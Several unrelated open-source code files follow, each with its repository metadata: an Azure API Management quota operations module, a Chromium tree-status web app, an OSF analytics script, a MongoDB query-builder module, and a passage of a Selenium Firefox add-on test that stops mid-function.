deserialized = self._deserialize("QuotaCounterContract", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/quotas/{quotaCounterKey}/periods/{quotaPeriodKey}"} # type: ignore
@overload
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: _models.QuotaCounterValueUpdateContract,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period.
Required.
:type parameters: ~azure.mgmt.apimanagement.models.QuotaCounterValueUpdateContract
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period.
Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: Union[_models.QuotaCounterValueUpdateContract, IO],
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period. Is
either a model type or a IO type. Required.
:type parameters: ~azure.mgmt.apimanagement.models.QuotaCounterValueUpdateContract or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
) # type: Literal["2021-08-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.QuotaCounterContract]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "QuotaCounterValueUpdateContract")
request = build_update_request(
resource_group_name=resource_group_name,
service_name=service_name,
quota_counter_key=quota_counter_key,
quota_period_key=quota_period_key,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.update.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("QuotaCounterContract", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/quotas/{quotaCounterKey}/periods/{quotaPeriodKey}"} # type: ignore
|
{
"content_hash": "2c56732a4518f28d92ff5b5d6ea35a1a",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 221,
"avg_line_length": 47.10958904109589,
"alnum_prop": 0.6653096830473975,
"repo_name": "Azure/azure-sdk-for-python",
"id": "8ea0b5c93bdab6c90920c8baff44e300053ab6ba",
"size": "14272",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/aio/operations/_quota_by_period_keys_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
"""Status management pages."""
import datetime
import json
import re
from google.appengine.api import memcache
from google.appengine.ext import db
from appengine_module.chromium_status.base_page import BasePage
from appengine_module.chromium_status import utils
ALLOWED_ORIGINS = [
'https://gerrit-int.chromium.org',
'https://gerrit.chromium.org',
'https://chrome-internal-review.googlesource.com',
'https://chromium-review.googlesource.com',
]
class TextFragment(object):
"""Simple object to hold text that might be linked"""
def __init__(self, text, target=None, is_email=False):
self.text = text
self.target = target
self.is_email = is_email
def __repr__(self):
return 'TextFragment({%s->%s})' % (self.text, self.target)
class LinkableText(object):
"""Turns arbitrary text into a set of links"""
GERRIT_URLS = {
'chrome': 'https://chrome-internal-review.googlesource.com',
'chromium': 'https://chromium-review.googlesource.com',
}
WATERFALL_URLS = {
'chromeos': 'https://uberchromegw.corp.google.com/i/chromeos',
'chromiumos': 'http://build.chromium.org/p/chromiumos',
}
APP_PREFIXES = (
'dev~',
's~',
)
# Automatically linkify known strings for the user.
_CONVERTS = []
@classmethod
def register_converter(cls, regex, target, pretty, is_email, flags=re.I):
"""Register a new conversion for creating links from text"""
cls._CONVERTS.append(
(re.compile(regex, flags=flags), target, pretty, is_email))
@classmethod
def bootstrap(cls, is_chromiumos):
"""Add conversions (possibly specific to |app_name| instance)"""
# Convert CrOS bug links. Support the forms:
# http://crbug.com/1234
# http://crosbug.com/1234
# crbug/1234
# crosbug/p/1234
cls.register_converter(
# 1 2 3 4 5 6 7
r'\b((http://)?((crbug|crosbug)(\.com)?(/(p/)?[0-9]+)))\b',
r'http://\4.com\6', r'\1', False)
# Convert internal b/ bug links.
cls.register_converter(
r'\b(http://)?(b/([0-9]+))\b',
r'https://b.corp.google.com/\3', r'\2', False)
# Convert e-mail addresses.
cls.register_converter(
r'(([-+.a-z0-9_!#$%&*/=?^_`{|}~]+)@[-a-z0-9.]+\.[a-z0-9]+)\b',
r'\1', r'\2', True)
# Convert SHA1's to gerrit links. Assume all external since
# there is no sane way to detect it's an internal CL.
cls.register_converter(
r'\b([0-9a-f]{40})\b',
r'%s/#q,\1,n,z' % cls.GERRIT_URLS['chromium'], r'\1', False)
# Convert public gerrit CL numbers which take the form:
# CL:1234
cls.register_converter(
r'\b(CL[: ]([0-9]+))\b',
r'%s/\2' % cls.GERRIT_URLS['chromium'], r'\1', False)
# Convert internal gerrit CL numbers which take the form:
# CL:*1234
cls.register_converter(
r'\b(CL[: ]\*([0-9]+))\b',
r'%s/\2' % cls.GERRIT_URLS['chrome'], r'\1', False)
# Match the string:
# Automatic: "cbuildbot" on "x86-generic ASAN" from.
# Do this for everyone since "cbuildbot" is unique to CrOS.
# Otherwise, we'd do it only for chromium |app_name| instances.
cls.register_converter(
r'("cbuildbot" on "([^"]+ (canary|master|launcher))")',
r'%s/builders/\2' % cls.WATERFALL_URLS['chromeos'], r'\1', False)
cls.register_converter(
r'("cbuildbot" on "([^"]+)")',
r'%s/builders/\2' % cls.WATERFALL_URLS['chromiumos'], r'\1', False)
if is_chromiumos:
# Match the string '"builder name"-internal/public-buildnumber:'. E.g.,
# "Canary master"-i-120:
# This applies only to the CrOS instance where the builders may update
# the tree status directly.
cls.register_converter(
r'("([\w\s]+)"-i-(\d+):)',
r'%s/builders/\2/builds/\3' % cls.WATERFALL_URLS['chromeos'],
r'\1', False
)
cls.register_converter(
r'("([\w\s]+)"-p-(\d+):)',
r'%s/builders/\2/builds/\3' % cls.WATERFALL_URLS['chromiumos'],
r'\1', False
)
@classmethod
def parse(cls, text):
"""Creates a list of TextFragment objects based on |text|"""
if not text:
return []
for prog, target, pretty_text, is_email in cls._CONVERTS:
m = prog.search(text)
if m:
link = TextFragment(m.expand(pretty_text),
target=m.expand(target),
is_email=is_email)
left_links = cls.parse(text[:m.start()].rstrip())
right_links = cls.parse(text[m.end():].lstrip())
return left_links + [link] + right_links
return [TextFragment(text)]
def __init__(self, text):
self.raw_text = text
self.links = self.parse(text.strip())
def __str__(self):
return self.raw_text
class Status(db.Model):
"""Description for the status table."""
# The username who added this status.
username = db.StringProperty(required=True)
# The date when the status got added.
date = db.DateTimeProperty(auto_now_add=True)
# The message. It can contain html code.
message = db.StringProperty(required=True)
def __init__(self, *args, **kwargs):
# Normalize newlines otherwise the DB store barfs. We don't really want to
# make this field handle newlines as none of the places where we output the
# content is designed to handle it, nor the clients that consume us.
kwargs['message'] = kwargs.get('message', '').replace('\n', ' ')
super(Status, self).__init__(*args, **kwargs)
@property
def username_links(self):
return LinkableText(self.username)
@property
def message_links(self):
return LinkableText(self.message)
@property
def general_state(self):
"""Returns a string representing the state that the status message
describes.
Note: Keep in sync with main.html help text.
"""
message = self.message
closed = re.search('close', message, re.IGNORECASE)
if closed and re.search('maint', message, re.IGNORECASE):
return 'maintenance'
if re.search('throt', message, re.IGNORECASE):
return 'throttled'
if closed:
return 'closed'
return 'open'
@property
def can_commit_freely(self):
return self.general_state == 'open'
def AsDict(self):
data = super(Status, self).AsDict()
data['general_state'] = self.general_state
data['can_commit_freely'] = self.can_commit_freely
return data
def get_status():
"""Returns the current Status, e.g. the most recent one."""
status = memcache.get('last_status')
if status is None:
status = Status.all().order('-date').get()
# Use add instead of set(); must not change it if it was already set.
memcache.add('last_status', status)
return status
def put_status(status):
"""Sets the current Status, e.g. append a new one."""
status.put()
memcache.set('last_status', status)
memcache.delete('last_statuses')
def get_last_statuses(limit):
"""Returns the last |limit| statuses."""
statuses = memcache.get('last_statuses')
if not statuses or len(statuses) < limit:
statuses = Status.all().order('-date').fetch(limit)
memcache.add('last_statuses', statuses)
return statuses[:limit]
def parse_date(date):
"""Parses a date."""
match = re.match(r'^(\d\d\d\d)-(\d\d)-(\d\d)$', date)
if match:
return datetime.datetime(
int(match.group(1)), int(match.group(2)), int(match.group(3)))
if date.isdigit():
return datetime.datetime.utcfromtimestamp(int(date))
return None
def limit_length(string, length):
"""Limits the string |string| at length |length|.
Inserts an ellipsis if it is cut.
"""
string = unicode(string.strip())
if len(string) > length:
string = string[:length - 1] + u'…'
return string
class AllStatusPage(BasePage):
"""Displays a big chunk, 1500, status values."""
@utils.requires_read_access
def get(self):
query = db.Query(Status).order('-date')
start_date = self.request.get('startTime')
if start_date:
query.filter('date <', parse_date(start_date))
try:
limit = int(self.request.get('limit'))
except ValueError:
limit = 1000
end_date = self.request.get('endTime')
beyond_end_of_range_status = None
if end_date:
query.filter('date >=', parse_date(end_date))
# We also need to get the very next status in the range, otherwise
# the caller can't tell what the effective tree status was at time
# |end_date|.
beyond_end_of_range_status = Status.all(
).filter('date <', end_date).order('-date').get()
out_format = self.request.get('format', 'csv')
if out_format == 'csv':
# It's not really an html page.
self.response.headers['Content-Type'] = 'text/plain'
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['status'] = query.fetch(limit)
template_values['beyond_end_of_range_status'] = beyond_end_of_range_status
self.DisplayTemplate('allstatus.html', template_values)
elif out_format == 'json':
self.response.headers['Content-Type'] = 'application/json'
self.response.headers['Access-Control-Allow-Origin'] = '*'
statuses = [s.AsDict() for s in query.fetch(limit)]
if beyond_end_of_range_status:
statuses.append(beyond_end_of_range_status.AsDict())
data = json.dumps(statuses)
callback = self.request.get('callback')
if callback:
if re.match(r'^[a-zA-Z$_][a-zA-Z$0-9._]*$', callback):
data = '%s(%s);' % (callback, data)
self.response.out.write(data)
else:
self.response.headers['Content-Type'] = 'text/plain'
self.response.out.write('Invalid format')
class CurrentPage(BasePage):
"""Displays the /current page."""
def get(self):
# Show login link on current status bar when login is required.
out_format = self.request.get('format', 'html')
if out_format == 'html' and not self.read_access and not self.user:
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['show_login'] = True
self.DisplayTemplate('current.html', template_values, use_cache=True)
else:
self._handle()
@utils.requires_bot_login
def post(self):
"""Handles the same get request from a backdoor.
POST to receive the password plaintext without polluting the logs.
"""
return self._handle()
@utils.requires_read_access
def _handle(self):
"""Displays the current message in various formats."""
out_format = self.request.get('format', 'html')
status = get_status()
if out_format == 'raw':
self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.out.write(status.message)
elif out_format == 'json':
self.response.headers['Content-Type'] = 'application/json'
origin = self.request.headers.get('Origin')
if self.request.get('with_credentials') and origin in ALLOWED_ORIGINS:
self.response.headers['Access-Control-Allow-Origin'] = origin
self.response.headers['Access-Control-Allow-Credentials'] = 'true'
else:
self.response.headers['Access-Control-Allow-Origin'] = '*'
data = json.dumps(status.AsDict())
callback = self.request.get('callback')
if callback:
if re.match(r'^[a-zA-Z$_][a-zA-Z$0-9._]*$', callback):
data = '%s(%s);' % (callback, data)
self.response.out.write(data)
elif out_format == 'html':
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['show_login'] = False
template_values['message'] = status.message
template_values['state'] = status.general_state
self.DisplayTemplate('current.html', template_values, use_cache=True)
else:
self.error(400)
class StatusPage(BasePage):
"""Displays the /status page."""
def get(self):
"""Displays 1 if the tree is open, and 0 if the tree is closed."""
# NOTE: This item is always public to allow waterfalls to check it.
status = get_status()
self.response.headers['Cache-Control'] = 'no-cache, private, max-age=0'
self.response.headers['Content-Type'] = 'text/plain'
self.response.out.write(str(int(status.can_commit_freely)))
@utils.requires_bot_login
@utils.requires_write_access
def post(self):
"""Adds a new message from a backdoor.
The main difference with MainPage.post() is that it doesn't look for
conflicts and doesn't redirect to /.
"""
# TODO(tandrii): switch to using service accounts.
message = self.request.get('message')
message = limit_length(message, 500)
username = self.request.get('username')
if message and username:
put_status(Status(message=message, username=username))
self.response.out.write('OK')
class StatusViewerPage(BasePage):
"""Displays the /status_viewer page."""
@utils.requires_read_access
def get(self):
"""Displays status_viewer.html template."""
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
self.DisplayTemplate('status_viewer.html', template_values)
class MainPage(BasePage):
"""Displays the main page containing the last 25 messages."""
# NOTE: This is require_login in order to ensure that authentication doesn't
# happen while changing the tree status.
@utils.requires_login
@utils.requires_read_access
def get(self):
return self._handle()
def _handle(self, error_message='', last_message=''):
"""Sets the information to be displayed on the main page."""
try:
limit = min(max(int(self.request.get('limit')), 1), 1000)
except ValueError:
limit = 25
status = get_last_statuses(limit)
current_status = get_status()
if not last_message:
last_message = current_status.message
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['status'] = status
template_values['message'] = last_message
template_values['last_status_key'] = current_status.key()
template_values['error_message'] = error_message
template_values['limit'] = limit
self.DisplayTemplate('main.html', template_values)
@utils.requires_login
@utils.requires_write_access
def post(self):
"""Adds a new message."""
# We pass these variables back into get(), prepare them.
last_message = ''
error_message = ''
# Get the posted information.
new_message = self.request.get('message')
new_message = limit_length(new_message, 500)
last_status_key = self.request.get('last_status_key')
if not new_message:
# A submission contained no data. It's a better experience to redirect
# in this case.
self.redirect("/")
return
current_status = get_status()
if current_status and (last_status_key != str(current_status.key())):
error_message = ('Message not saved, mid-air collision detected, '
'please resolve any conflicts and try again!')
last_message = new_message
return self._handle(error_message, last_message)
else:
put_status(Status(message=new_message, username=self.user.email()))
self.redirect("/")
def bootstrap():
# Guarantee that at least one instance exists.
if db.GqlQuery('SELECT __key__ FROM Status').get() is None:
Status(username='none', message='welcome to status').put()
LinkableText.bootstrap(BasePage.IS_CHROMIUMOS)
|
{
"content_hash": "241c104e1caab19512d9b9320a101956",
"timestamp": "",
"source": "github",
"line_count": 453,
"max_line_length": 80,
"avg_line_length": 34.211920529801326,
"alnum_prop": 0.6395018712091883,
"repo_name": "nicko96/Chrome-Infra",
"id": "b6d7f9be8a27637a34620bda611bcc3cf4d9ad5c",
"size": "15682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "appengine/chromium_status/appengine_module/chromium_status/status.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "100398"
},
{
"name": "Go",
"bytes": "648467"
},
{
"name": "HTML",
"bytes": "7323317"
},
{
"name": "JavaScript",
"bytes": "913960"
},
{
"name": "Makefile",
"bytes": "11281"
},
{
"name": "Protocol Buffer",
"bytes": "2730"
},
{
"name": "Python",
"bytes": "4034630"
},
{
"name": "Shell",
"bytes": "21687"
}
],
"symlink_target": ""
}
|
import os
import datetime
import collections
import tabulate
from modularodm import Q
from dateutil.relativedelta import relativedelta
from framework.analytics import get_basic_counters
from website import settings
from website.app import init_app
from website.models import User, PrivateLink
from website.addons.dropbox.model import DropboxUserSettings
from website.addons.osfstorage.model import OsfStorageFileRecord
from scripts.analytics import profile, tabulate_emails, tabulate_logs
def get_active_users():
return User.find(
Q('is_registered', 'eq', True) &
Q('password', 'ne', None) &
Q('is_merged', 'ne', True) &
Q('date_confirmed', 'ne', None)
)
def get_dropbox_metrics():
metrics = {
'enabled': [],
'authorized': [],
'linked': [],
}
for node_settings in DropboxUserSettings.find():
metrics['enabled'].append(node_settings)
if node_settings.has_auth:
metrics['authorized'].append(node_settings)
if node_settings.nodes_authorized:
metrics['linked'].append(node_settings)
return metrics
def get_private_links():
return PrivateLink.find(
Q('is_deleted', 'ne', True)
)
def count_user_nodes(users=None):
users = users or get_active_users()
return [
len(
user.node__contributed.find(
Q('is_deleted', 'eq', False) &
Q('is_folder', 'ne', True)
)
)
for user in users
]
def count_user_logs(user, query=None):
if query:
return len(user.nodelog__created.find(query))
return len(user.nodelog__created)
def count_users_logs(users=None, query=None):
users = users or get_active_users()
return [
count_user_logs(user, query)
for user in users
]
def count_at_least(counts, at_least):
return len([
count for count in counts
if count >= at_least
])
def count_file_downloads():
downloads_unique, downloads_total = 0, 0
for record in OsfStorageFileRecord.find():
page = ':'.join(['download', record.node._id, record.path])
unique, total = get_basic_counters(page)
downloads_unique += unique or 0
downloads_total += total or 0
return downloads_unique, downloads_total
LogCounter = collections.namedtuple('LogCounter', ['label', 'delta'])
log_counters = [
LogCounter('total', None),
LogCounter('last-3m', relativedelta(months=3)),
LogCounter('last-1m', relativedelta(months=1)),
LogCounter('last-1w', relativedelta(weeks=1)),
LogCounter('last-1d', relativedelta(days=1)),
]
log_thresholds = [1, 11]
def get_log_counts(users):
rows = []
for counter in log_counters:
counts = count_users_logs(
users,
(
Q('date', 'gte', datetime.datetime.utcnow() - counter.delta)
if counter.delta
else None
),
)
for threshold in log_thresholds:
thresholded = count_at_least(counts, threshold)
rows.append([
'logs-gte-{0}-{1}'.format(threshold, counter.label),
thresholded,
])
return rows
def main():
active_users = get_active_users()
dropbox_metrics = get_dropbox_metrics()
extended_profile_counts = profile.get_profile_counts()
private_links = get_private_links()
downloads_unique, downloads_total = count_file_downloads()
node_counts = count_user_nodes(active_users)
nodes_at_least_1 = count_at_least(node_counts, 1)
nodes_at_least_3 = count_at_least(node_counts, 3)
rows = [
['active-users', active_users.count()],
['dropbox-users-enabled', len(dropbox_metrics['enabled'])],
['dropbox-users-authorized', len(dropbox_metrics['authorized'])],
['dropbox-users-linked', len(dropbox_metrics['linked'])],
['profile-edits', extended_profile_counts['any']],
['view-only-links', private_links.count()],
['downloads-unique', downloads_unique],
['downloads-total', downloads_total],
['nodes-gte-1', nodes_at_least_1],
['nodes-gte-3', nodes_at_least_3],
]
rows.extend(get_log_counts(active_users))
table = tabulate.tabulate(
rows,
headers=['label', 'value'],
)
with open(os.path.join(settings.ANALYTICS_PATH, 'main.txt'), 'w') as fp:
fp.write(table)
tabulate_emails.main()
tabulate_logs.main()
if __name__ == '__main__':
init_app()
main()
|
{
"content_hash": "f33753b5375f18c1955e93b4af8d0017",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 76,
"avg_line_length": 27.34131736526946,
"alnum_prop": 0.6108190976784932,
"repo_name": "kushG/osf.io",
"id": "78748aa34f7c3e18b50963c79275e53f588137d8",
"size": "4607",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "scripts/analytics/benchmarks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "74880"
},
{
"name": "HTML",
"bytes": "34349"
},
{
"name": "JavaScript",
"bytes": "839000"
},
{
"name": "Mako",
"bytes": "465890"
},
{
"name": "Python",
"bytes": "2490642"
},
{
"name": "Shell",
"bytes": "234"
}
],
"symlink_target": ""
}
|
from .spec import Equal, NotEqual, LessThan, LessThanEqual, GreaterThan, GreaterThanEqual, In, NotIn, \
Exists, Type, Where, UpdateSpecification, Mod, All, Size, Slice, QuerySpecification, Match
import types
import re
__all__ = ['Common', 'String', 'Number', 'List', 'Reference']
class _Base(object):
def get_key(self, *args, **kwargs):
raise NotImplemented
def _validate(self, *args, **kwargs):
raise NotImplemented
def to_mongo(self, value):
raise NotImplemented
class Common(_Base):
def __eq__(self, other):
return self.eq(other)
def eq(self, other):
return Equal([self.get_key(), '', other])
def __ne__(self, other):
return self.ne(other)
def ne(self, other):
return NotEqual([self.get_key(), 'ne', other])
def __lt__(self, other):
return self.lt(other)
def lt(self, other):
return LessThan([self.get_key(), 'lt', other])
def __le__(self, other):
return self.lte(other)
def lte(self, other):
return LessThanEqual([self.get_key(), 'lte', other])
def __gt__(self, other):
return self.gt(other)
def gt(self, other):
return GreaterThan([self.get_key(), 'gt', other])
def __ge__(self, other):
return self.gte(other)
def gte(self, other):
return GreaterThanEqual([self.get_key(), 'gte', other])
def in_(self, vals):
return In([self.get_key(), 'in', vals])
def nin(self, vals):
return NotIn([self.get_key(), 'nin', vals])
def exists(self):
return Exists([self.get_key(), 'exists', True])
def type(self, type_):
return Type([self.get_key(), 'type', type_])
def where(self, javascript):
return Where([self.get_key(), 'where', javascript])
def rename(self):
raise NotImplementedError()
def set(self, val):
self._validate(val)
return UpdateSpecification(['set', self.get_key(True), self.to_mongo(val)])
def unset(self):
return UpdateSpecification(['unset', self.get_key(True), 1])
class String(_Base):
def startswith(self, value):
return self.re(r'^%s' % value)
def istartswith(self, value):
return self.ire(r'^%s' % value)
def endswith(self, value):
return self.re(r'%s$' % value)
def iendswith(self, value):
return self.ire(r'%s$' % value)
def contains(self, value):
return self.re(r'%s' % value)
def icontains(self, value):
return self.ire(r'%s' % value)
def re(self, pattern):
return Equal([self.get_key(), '', re.compile(pattern)])
def ire(self, pattern):
return Equal([self.get_key(), '', re.compile(pattern, re.IGNORECASE)])
class Number(_Base):
def __add__(self, val):
return self.inc(val)
def inc(self, val=1):
self._validate(val)
return UpdateSpecification(['inc', self.get_key(True), val])
def __sub__(self, val):
return self.dec(val)
def dec(self, val=1):
self._validate(val)
return UpdateSpecification(['inc', self.get_key(True), -val])
def __mod__(self, other):
class Proxy(object):
def __init__(self, field, a):
self.field = field
self.a = a
def __eq__(self, b):
return Mod([self.field.get_key(False), 'mod', [self.a, b]])
eq = __eq__
def __ne__(self, b):
return Mod([self.field.get_key(False), 'not mod', [self.a, b]])
ne = __ne__
return Proxy(self, other)
def mod(self, a, b):
return Mod([self.name, 'mod', [a, b]])
class List(_Base):
def all(self, vals):
return All([self.get_key(), 'all', vals])
def size(self, size):
return Size([self.get_key(), 'size', size])
def match(self, *specs):
return Match([self.get_key(), 'elemMatch', specs])
def pop(self):
return UpdateSpecification(['pop', self.get_key(True), 1])
def popleft(self):
return UpdateSpecification(['pop', self.get_key(True), -1])
def __getitem__(self, key):
return self.slice(key)
def slice(self, key):
if isinstance(key, slice):
return Slice([self.get_key(), 'slice', [key.start, key.stop]])
return Slice([self.get_key(), 'slice', key])
def __or__(self, val):
return self.add_to_set(val)
def add_to_set(self, val):
self.field._validate(val)
return UpdateSpecification(['addToSet', self.get_key(True), self.field.to_mongo(val)])
def __add__(self, val):
if type(val) in [types.ListType, types.TupleType]:
return self.push_all(val)
else:
return self.push(val)
def push(self, val):
self.field._validate(val)
return UpdateSpecification(['push', self.get_key(True), self.field.to_mongo(val)])
def push_all(self, val):
if type(val) not in [types.ListType, types.TupleType]:
raise TypeError()
map(self.field._validate, val)
return UpdateSpecification(['pushAll', self.get_key(True), map(self.field.to_mongo, val)])
def __sub__(self, val):
if type(val) in [types.ListType, types.TupleType]:
return self.pull_all(val)
else:
return self.pull(val)
def pull(self, val):
if isinstance(val, QuerySpecification):
val = val.compile(self.get_key(True))
return UpdateSpecification(['pull', self.get_key(True), val])
def pull_all(self, val):
if type(val) not in [types.ListType, types.TupleType]:
raise TypeError()
return UpdateSpecification(['pullAll', self.get_key(True), val])
def replace_with(self, val):
self.field._validate(val)
return UpdateSpecification(['set', self.get_key(True) + '.$', self.field.to_mongo(val)])
def __mod__(self, val):
return self.replace_with(val)
class Reference(Common):
def eq(self, other):
return Common.eq(self, self.to_mongo(other))
def ne(self, other):
return Common.ne(self, self.to_mongo(other))
def lt(self, other):
return Common.lt(self, self.to_mongo(other))
def lte(self, other):
return Common.lte(self, self.to_mongo(other))
def gt(self, other):
return Common.gt(self, self.to_mongo(other))
def gte(self, other):
return Common.gte(self, self.to_mongo(other))
def in_(self, vals):
vals = [self.to_mongo(val) for val in vals]
return Common.in_(self, vals)
def nin(self, vals):
vals = [self.to_mongo(val) for val in vals]
return Common.nin(self, vals)
def set(self, val):
self._validate(val)
return Common.set(self, self.to_mongo(val))
|
{
"content_hash": "67228f5393fe86966900e956591806da",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 103,
"avg_line_length": 27.304,
"alnum_prop": 0.5754468209786112,
"repo_name": "GGOutfitters/conjure",
"id": "74147d3fadb99c26b37014cba766136ffce9220e",
"size": "6826",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "conjure/operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "148812"
}
],
"symlink_target": ""
}
|
import os
import zipfile
from selenium.webdriver.common.by import By
extensions = os.path.abspath("../../../../../../test/extensions/")
def test_install_uninstall_signed_addon_xpi(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example.xpi")
id = driver.install_addon(extension)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_signed_addon_zip(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example.zip")
id = driver.install_addon(extension)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_unsigned_addon_zip(driver, pages):
extension = os.path.join(extensions, "webextensions-selenium-example-unsigned.zip")
id = driver.install_addon(extension, temporary=True)
assert id == "webextensions-selenium-example@example.com"
pages.load("blank.html")
injected = driver.find_element(By.ID, "webextensions-selenium-example")
assert injected.text == "Content injected by webextensions-selenium-example"
driver.uninstall_addon(id)
driver.refresh()
assert len(driver.find_elements(By.ID, "webextensions-selenium-example")) == 0
def test_install_uninstall_signed_addon_dir(driver, pages):
